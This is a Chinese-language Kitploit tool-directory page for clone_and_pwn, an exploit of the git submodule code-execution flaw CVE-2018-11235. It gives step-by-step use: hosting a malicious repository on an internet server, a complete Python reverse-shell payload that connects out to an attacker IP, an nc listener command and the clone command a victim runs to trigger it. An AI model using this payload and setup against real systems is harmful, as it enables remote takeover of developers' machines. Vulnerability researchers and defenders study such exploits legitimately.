Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
clone_and_pwn — 利用 CVE-2018-11235 | Kitploit
工具/GitHubGitHub/h0k5/clone_and_pwn
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubh0k5/clone_and_pwn

clone_and_pwn

利用 CVE-2018-11235

查看仓库
18年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

头部信息

漏洞利用标题: Clone and Pwn
日期: 2018年6月4日
漏洞利用作者: Alejandro Caceres
厂商主页: https://git-scm.com/
软件链接: https://git-scm.com/downloads
版本: 在 Git 2.13.7 之前、2.14.x 早于 2.14.4、2.15.x 早于 2.15.2、2.16.x 早于 2.16.4 以及 2.17.x 早于 2.17.1 的 git 客户端版本上可执行任意代码
测试环境: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235

CVE-2018-11235 漏洞利用用法

CVE-2018-11235, 这里称为 clone and pwn, 会创建一个利用 git 中漏洞的恶意 git 仓库。当使用 --recurse-submodules 标志克隆该仓库时, 会在 Git 2.13.7 之前、2.14.x 早于 2.14.4、2.15.x 早于 2.15.2、2.16.x 早于 2.16.4 以及 2.17.x 早于 2.17.1 的 git 客户端版本上执行任意代码。

要使用此模块, 只需将其放在具有直接互联网访问权限的服务器 (例如 AWS、Digital Ocean) 上, 然后打开 evil.sh。它看起来类似如下内容:

root@kitploit:~
#!/usr/bin/python

EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080

#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

将 EXTERN_IP 和 EXTERN_PORT 设置为你希望接收反向 shell 的 (外部) IP 和端口。可以通过类似以下方式接收反向 shell:

nc -l <EXTERN_IP> EXTERN_PORT 例如 nc -l 193.23.23.32 8080

或者使用 Metasploit 的通用 shell 模块。一旦用户执行了命令 git clone --recurse-submodules git://<your ip>/repo dest_dir, 你将会收到一个反向 shell。

如果多次运行 (或一次失败尝试后) 遇到问题, 请检查以下事项:

  • 运行 ./clean.sh, 注意这将删除 /tmp 中的所有数据
  • 使用 ps aux | grep git 检查进程, 确保你没有已经在运行 gitdaemon。结束所有 gitdaemon 进程。

致谢

代码源自 @peff 的 git 补丁 (参见 t/t7415-submodule-names.sh 测试文件)。

因此, 本仓库以 GNU 通用公共许可证第 2 版发布。

针对旧版本 git 的额外修复由 @atorralba 提供 (详情见此文)。

本脚本改编自 https://github.com/Rogdham/CVE-2018-11235, 向原作者致敬并致谢。

=======

clone_and_pwn

利用 CVE-2018-11235

作者: @_hyp3ri0n 和 @mehaase

下载工具